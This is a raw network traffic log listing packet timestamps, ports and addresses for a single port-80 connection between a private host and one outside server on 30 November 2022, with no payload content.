Nov 30, 2022 00:22:31.909223080 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909225941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909246922 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909257889 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909269094 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909276009 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909288883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909300089 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909311056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909318924 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909332991 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909337044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909353018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909360886 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909375906 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909379005 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909398079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909405947 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909420013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909427881 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909440041 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909441948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909462929 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909482956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909487009 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909503937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909513950 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909526110 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909538031 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909547091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909554005 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909568071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909574986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909591913 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909607887 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909723997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909759045 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909780025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909800053 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909821033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909837008 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909841061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909867048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909872055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909887075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909893990 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909917116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909919024 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909938097 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909943104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909960032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909966946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909980059 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.909981966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.909989119 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910003901 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910043955 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910262108 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910661936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910686016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910707951 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910727978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910747051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910753965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910768032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910778999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910790920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910809994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910816908 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910830975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910835981 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910851955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910864115 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910873890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910895109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910895109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910916090 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910938978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910963058 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910973072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.910984993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.910999060 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911007881 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911029100 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911030054 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911052942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911056995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911073923 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911086082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911096096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911106110 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911117077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911123037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911139011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911139965 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911161900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911164999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911183119 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.911187887 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911209106 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.911226034 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.913095951 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.913536072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917013884 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917041063 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917078972 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917084932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917104959 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917114973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917148113 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917165995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917169094 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917190075 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917211056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917236090 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917241096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917262077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917282104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917282104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917308092 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917331934 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917474031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917519093 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917524099 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917540073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917562962 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917571068 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917587042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917587996 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917610884 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917612076 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917632103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917638063 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917649984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917654037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917674065 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917675018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917695999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917706966 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917718887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917722940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917737007 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917741060 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917762041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917767048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917782068 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917783022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917802095 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917805910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917824030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917825937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917844057 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917848110 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917866945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917869091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917890072 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917891026 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917911053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917912006 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917934895 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917934895 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917958021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.917958975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.917982101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918001890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918010950 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918020010 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918023109 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918044090 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918055058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918066025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918086052 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918107986 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918118000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918118954 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918128014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918138981 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918149948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918154001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918170929 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918178082 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918196917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918210030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918407917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918428898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918447018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918467999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918488026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918509007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918514013 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918529987 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918550014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918550014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918550014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918567896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918574095 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918586016 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918602943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918616056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918663025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918684006 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918704987 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918725967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918730021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918745995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918761015 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918766975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918788910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918795109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918808937 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918823004 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918828964 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918849945 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918853045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918869972 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918890953 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918905973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918910980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918926954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918932915 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918950081 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918956041 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918972015 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918977022 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.918992996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.918998957 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919013023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919018030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919034004 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919039965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919055939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919065952 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919075966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919083118 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919097900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919106960 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919118881 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919120073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919142008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919156075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919162035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919177055 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919183016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919198990 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919203043 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919214010 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919224024 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919243097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919244051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919261932 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919265032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919276953 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919286013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919296980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919306993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919323921 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919327021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919341087 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919348955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919358969 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919369936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919373989 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919390917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919399977 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919411898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919416904 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919433117 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919435978 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919452906 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919459105 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919477940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919482946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919492960 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919504881 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919524908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919544935 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919549942 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919564962 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919578075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919585943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919608116 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919610023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919632912 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919639111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919653893 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919668913 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919676065 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919691086 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919697046 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919713974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919724941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919734001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919748068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919754028 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919770956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919775963 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919786930 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919846058 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919925928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919949055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919970036 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.919985056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.919995070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920006037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920017004 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920032024 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920037985 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920046091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920066118 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920068979 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920088053 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920089006 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920106888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920110941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920131922 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920145035 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920155048 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920176029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920181990 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920198917 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920208931 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920219898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920238972 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920241117 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920263052 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920283079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920296907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920304060 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920311928 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920326948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920346975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920351982 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920377016 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920406103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.920932055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920953035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920974016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.920996904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.921005011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.921017885 CET	80	49710	88.198.94.71	192.168.2.5
